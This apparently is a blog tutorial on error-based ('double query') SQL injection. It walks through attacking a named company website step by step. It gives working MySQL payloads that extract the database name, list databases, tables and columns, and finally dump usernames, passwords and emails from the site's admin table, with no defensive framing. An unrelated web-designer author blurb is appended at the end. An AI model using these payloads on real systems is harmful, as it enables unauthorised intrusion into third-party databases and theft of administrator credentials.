hello friends,Today we are gonna see about double query based sql injection
this post is by Divakar K
-->limit 1,1
this post is by Divakar K
- here is the url
http://www.advance-acoustic.com/en/produits/index/detail/id/3/sec/1
- now find the injection point
- here is how i got the injection point
http://www.advance-acoustic.com/en/produits/index/detail/id/3'/sec/1
- now the next step is to check whether we can extract database using union based command or not...but i don't get the details using the union based injection
- now we can learn about double query based sql injection
step 1: to find the current database name
COMMAND:
http://site.com/index.php?id=5+and(select 1 FROM(select count(*),concat((select (select concat(database())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
- http://www.advance-acoustic.com/en/produits/index/detail/id/3+and%28select%201%20FROM%28select%20count%28*%29,concat%28%28select%20%28select%20concat%28database%28%29%29%29%20FROM%20information_schema.tables%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20FROM%20information_schema.tables%20GROUP%20BY%20x%29a%29/sec/1
step 2:to find user name use user(), version-->version()
- you can get the list of database name using this command
+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT N,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
in this command check for "LIMIT N,1"
you have to increment the N value from 0 to no.of databases in that site
ex:i used limit 0,1
there are only two databases :-p
i can't increment further
this is how you get the list of databases
step 3: now to find the list of table in the particular database
+and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables WHERE table_schema=<HEX_VLAUE_OF_DB_NAME> LIMIT N,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
<HEX_VLAUE_OF_DB_NAME>--->here our database name is advance
hex value is CHAR(97, 100, 118, 97, 110, 99, 101)
like the previous step you need to increment the N value to get the list of tables in that particular database
limit 1,1 gives admin table :-p
step 4: now the next step is to find column name for the admin table
+and(select 1 FROM(select count(*),concat((select (select (select distinct concat(cast(column_name as char)) FROM information_schema.columns WHERE table_schema=<HEX_VLAUE_OF_DB_NAME> AND table_name=<HEX_VLAUE_OF_TABLE_NAME> LIMIT N,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
<HEX_VLAUE_OF_DB_NAME>----->CHAR(97, 100, 118, 97, 110, 99, 101)
<HEX_VLAUE_OF_TABLE_NAME>--->CHAR(97, 100, 109, 105, 110)
as like the previous step you need to increment the N value to get list of column name
limit 0,1-->username1
limit 1,1-->password1
step 5: last step is to dump the values :-p
+and+(select 1 FROM(select+count(*),concat((select+concat(0x3a,username,0x3a,password,0x3a,email,0x3a) FROM <TABLE_NAME>+LIMIT+0,1),floor(rand(0)*2))x FROM information_schema.tables+GROUP BY x)b)
Ichsan Bahri
I'm Ichsan. A full time web designer. I enjoy to make modern template. I love create blogger template and write about web design, blogger. Now I'm working with Themeforest. You can buy our templates from Themeforest.
Website: http://sagoe.net/
No Comment to " Strange Sql injection "